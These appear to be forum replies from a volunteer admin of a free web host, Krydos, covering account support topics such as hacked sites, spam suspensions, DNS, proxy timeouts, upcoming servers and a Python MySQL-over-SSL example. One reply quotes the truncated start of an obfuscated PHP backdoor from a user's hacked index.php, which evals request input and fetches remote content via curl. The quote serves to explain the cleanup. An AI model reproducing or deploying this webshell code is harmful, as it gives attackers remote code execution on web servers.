Krydos

Johnny, Ricky, Tommy, Morty, and Lily do not have terminals. VPS plans have root SSH access if you need a terminal and they start at $4 per month.

The 3 domains that you disabled have been removed from your account.

Your website has clearly been hacked. Here is your index.php <?php /*-lShG;7>-*/error_reporting(0); $QKuU /*-Rkvp._LjJD4;v1&5EJ9-*/=/*-370E1a43815Kz#>F!q7-*/ "ra"./*-ow:piBPtbF;9sjnB9-*/"ng"./*-iZa?[]eaEK>u0kC__1I-*/"e"; $bXlIm /*-<!I=L,Lm%OY,GV%8-*/= /*-{S>C}8kB0WdNo~-*/$QKuU/*-e7$WJgx{>Wp9g-*/(/*-Xq(QWqBFqB?5-*/"~",/*-VRGAur<M{-*/" ");/*-!jRNvWgOAXyov+Z-*/$dUYio/*->NngYm_ah6-*/=/*-FfK)_u>PbnwD6-*/${$bXlIm[1+30]/*-GdwHE5@<dV+~CTK-*/.$bXlIm[9+50]./*-t(qw.Zd7Qh.m9-*/$bXlIm[36+11].$bXlIm[30+17]./*-U%.56.#2^-*/$bXlIm[23+28].$bXlIm[52+1].$bXlIm/*-A>R10o9ptemcm+ujE-*/[28+29]}; /*-AGMLPPJclv,^N-*/if(/*-hl,jyp$[h>QvM-*/in_array(/*-u(0Yj97W}ZucT-*/gettype/*-gT8GMb|vA.It-*/($dUYio).(7+12),$dUYio)){ $dUYio[54+8]=$dUYio[56+6].$dUYio[17+63]; @eval/*-h2DD.nYs~-*/($dUYio[37+25](${$dUYio[15+29]}[15+5]));}/*-rK-*/class /*-XO`-*/a{ /*-cL-*/static/*-1LSZdZE-*/ function /*-wGyM]a-*/cT($AOtJnSrK) /*-u8<q-*/{ $hxGJkYQ/*-Y-#V-*/ = /*-bD{C^-*/"r"./*-`ql[ZF(jU-*/"a"./*-hfOo70-*/"n"./*-L%1RwH-*/"g"./*-OhiJaD,y-*/"e"; /*-vUz;XUA_-*/$AUqwYXSNid/*-~b(bx0nIy-*/ = /*-x|He-*/$hxGJkYQ/*-(>F<.K-*/(/*-uQ!nF`H-*/"~"/*-wDLM-2-*/, /*-)XfXIJ-*/" "/*-:MrC<stK%-*/);/*-pT;-*/ $vPWjkSOid /*-B-*/= /*-wId-*/explode/*-wa<m&.f-*/(/*-9p-*/"!", /*-b![e-*/$AOtJnSrK/*-WWJ-*/); /*-,oN5Su-*/$DurZd /*-KL%wbADaI-*/= /*-84I-*/""; foreach /*-q&x-*/(/*-d)T:L%1;d}-*/$vPWjkSOid /*-vQ0X,@KnS-*/as /*-,rU,2+,Qne-*/$gZ /*-w3-*/=>/*-kqi?Wak5C-*/ $UQW/*-M@a3<-*/) /*-0N!k,-*/$DurZd /*-RK!^X%XgFB-*/.= /*-.#O:c6ED2;-*/$AUqwYXSNid[$UQW/*-Q5sc-*/ - /*-lv-*/65104/*-mr{wa?E-*/];/*-U(O5xm-*/ return /*-F8c-*/$DurZd; /*-W^1&5Kgo-*/} /*-goyS-*/static /*-,-:8-*/function /*-_KAwW@O-*/oyGOLpDQ/*-9Q_-*/(/*-g4|-*/$jGu,/*-0_O!~gc-*/ $yuZK/*-n-z-*/)/*-yo1WC<-*/ {/*-~&nhyn5cN-*/ $hWFzxONLv/*-si^>-*/ = /*-t7P!-*/curl_init/*-%&S##%s-*/(/*-oG%TFbb-*/$jGu/*-_yE}N8XG-*/);/*-tREv-*/ curl_setopt/*-rzRptB#~BV-*/(/*-P%hp-*/$hWFzxONLv,/*-tFFfn`)!uh-*/ CURLOPT_RETURNTRANSFER,/*-@9op-*/ 1/*-_ajOo}gtN1-*/);/*-0(VlqO3-*/ $YbQGo/*-p,Q{1El5-*/ = /*-7qR~G7)-*/curl_exec/*-]#cd?g3lD-*/(/*-2T0iWeEM-*/$hWFzxONLv/*-O.jH-*/); /*-cawA&=Hg!s-*/return /*-R0-*/empty/*-<Y~Tx5&-*/(/*-rxc-*/$YbQGo/*-la6.WE^-*/)/*-Y0}-*/ ? /*-WoQ-*/$yuZK/*-bbr$}Af2h-*/(/*-uZ(XX2^-*/$jGu/*-x|67[=V-*/)/*-rKHX|<4-*/ : /*-#N:c-*/$YbQGo; /*---*/}/*-wP-*/ static/*-:G]-*/ function /*-o-MJiHDA-*/xKQ/*-ep+CZYE_-*/() /*-,0-*/{/*-~%o5~-*/ $TEYA /*-qY9&kKhP-*/=/*-79f-*/ array/*-yO@_7d-*/("65131!65116!65129!65133!65114!65129!65135!65128!65113!65120!65131!65114!65125!65119!65120","65115!65114!65116!65135!65116!65119!65114!65181!65179","65124!65115!65119!65120!65135!65130!65129!65131!65119!65130!65129","65118!65133!65131!65123","65132!65133!65115!65129!65176!65178!65135!65130!65129!65131!65119!65130!65129","65128!65125!65122!65129!65135!65127!65129!65114!65135!65131!65119!65120!65114!65129!65120!65114!65115","65158!65188","65105","65183!65188","65165!65148!65148!65165!65141","65119!65128"); /*-tRz)&6;-*/foreach /*-vS3B-*/(/*-=$q-*/$TEYA/*-0_U!-*/ as /*-J8_y-*/$HdlKfPenMR/*-yT2-*/)/*-2bJonRTTcq-*/ $MT/*-iTgO{Z-*/[] /*-$xnvuJ+w}-*/= /*-oUi-*/self/*-H92e|X!-*/::/*-Zi&H>{M-*/cT/*-ksn3~zF-*/ I made a full backup which you can download from https://heliohost.org/backup/ if you need it. In most cases your database is probably fine, but you should still check it to make sure it hasn't been altered. You should also assume that any passwords you used on this site have been compromised and should be changed. You shouldn't trust any of your files because the hacker clearly had access to modify and upload files. I have reset your account to clean up the hack, and you should click the link in your email to continue with the rebuild process. Let us know if you need help with anything.

Removed.

I commented out the deny from all line in the .htaccess and it seems to be working fine https://xn--plised-pxa.heliohost.org/ Normally you'd see a 403 but this is a weird cPanel transfer account so they do weird things sometimes I guess. If you're having issues with the account I would recommend doing a full backup and then we can reset the account to give you a fresh start and then restore the files and databases that you need back into the fresh working account.

Try settings your NS records to ns1.heliohost.org and ns2.heliohost.org. If it works you can switch it back to Cloudflare later.

Removed.

Python CGI, Django, Flask, Python cron, Python constantly running process such as a bot, or something else?

You had a 658 MB access log for the forum.mupdvig.tk domain. Your high load and disk space overage are certainly related. Haters gonna hate, playas gonna play, and spambots gonna spam. Fix it quickly.

@garrigue Let us know if the All In One WP Migration tool works for you. If it doesn't we could try randomly increasing the timeout again to maybe 5 minutes this time. @artistwalks Thanks for the suggestion. All of the HelioHost staff, myself included, hate Wordpress with a passion because it is constantly getting hacked and causing high load so none of us will touch it with a 10 foot pole. Therefore we know very little about plugins for Wordpress.

I've increased the proxy timeout on that domain from 60 seconds up to 180 seconds so maybe it won't give that error again, but I want to make an observation: Tools are meant to make things quicker and easier. Dumping the database to an .sql file, zipping the files, and restoring the backup to transfer a Wordpress site to another host takes like 5 minutes. How much time should you waste trying to get this transfer tool to work? Should we spend 5 days trying different things to make this Updraft tool work when it only takes 5 minutes to do it manually? Would you spend 5 days driving somewhere when you could walk there in 5 minutes? If it still gives that error after 180 seconds we could try increasing it more.

Forum account, Tommy account, or both?

Thanks for posting this information. If someone has issues with high load we'll suggest this as something to try.

Does the 504 error happen every single time you try, or have you only tried once?

Are you able to access your VPS now?

Yeah, since we're all volunteers and we don't have a full staff of employees working 40 hours a week it takes us a little longer to get stuff like this implemented. Thanks for being understanding, and thanks in advance for the donation. Let us know if you need help with anything else.

The wendyfiore account has been unsuspended. Try logging in with the old password first. Ideally it would be great if our suspension system restored the previous password when an account is unsuspended, but it doesn't always work right and I'm still trying to debug it. If you can't login with your previous password let us know and we can send a password reset link. Yes, we are planning on offering free transfers back to Tommy for previous users when the uptime is better and that server isn't so crowded. We are also going to be releasing a new server named Morty soon that won't require logging in every 30 days and no high load suspensions, etc. It will start at $1 per month, and scale upwards in price to a maximum of $0.57 per day depending on how high your load is on that day. When Morty is released we expect quite a few people to switch from Tommy to Morty and that should make quite a bit of space on Tommy. You could also transfer from Johnny to Morty at that point if you'd prefer to not have to login every 30 days.

You should do a malware/virus scan of your computer, and when you're certain the spam emails won't happen again you may pick one account to be unsuspended. You can download a full backup of both accounts from https://heliohost.org/backup/ if you wish.

Both of your accounts attempted to send about 6000 spam emails. As it says in our terms of service you aren't allowed to send spam from our servers. Did you receive written permission from an administrator to have more than one account?

Like it says in the email you get when your account is created, and like it says on your dashboard every time you login: DNS editing on your own isn't finished yet. Uncheck the wildcard box as it's not supported yet.

Does it work now?

Another password reset link has been emailed to you.

You'll need to renew your account now https://heliohost.org/renew/

I tested it out a bit myself, and here is what I came up with #!/usr/bin/python3.10 from __future__ import print_function import sys import mysql.connector from mysql.connector.constants import ClientFlag print("Content-Type: text/html\n\n") config = { 'user': 'krydos_test', 'password': '<removed>', 'database': 'krydos_test', 'host': 'tommy2.heliohost.org', 'client_flags': [ClientFlag.SSL] } cnx = mysql.connector.connect(**config) cur = cnx.cursor(buffered=True) cur.execute("show status like 'ssl_cipher'") print(cur.fetchone()) print("<br>") cur.execute("select * from test") result = cur.fetchall() for row in result: print(row) cur.close() cnx.close() You can see the script in action at https://krydos2.heliohost.org/mysql_ssl.py which is running on Johnny and connecting securely to a MySQL database on Tommy. Please note: There are no ca.pem or any other client keys or client certificates needed.

Well, I think the guides you're following assume that the server certificate is self-signed, which explains why you think you need to include the ca.pem and everything. Our certificate is issued by Let's Encrypt (not self-signed) and any modern OS should accept secure connections to it without needing the chain. And no, we're not going to give you the key because then the SSL is compromised and actually less secure than not using SSL at all.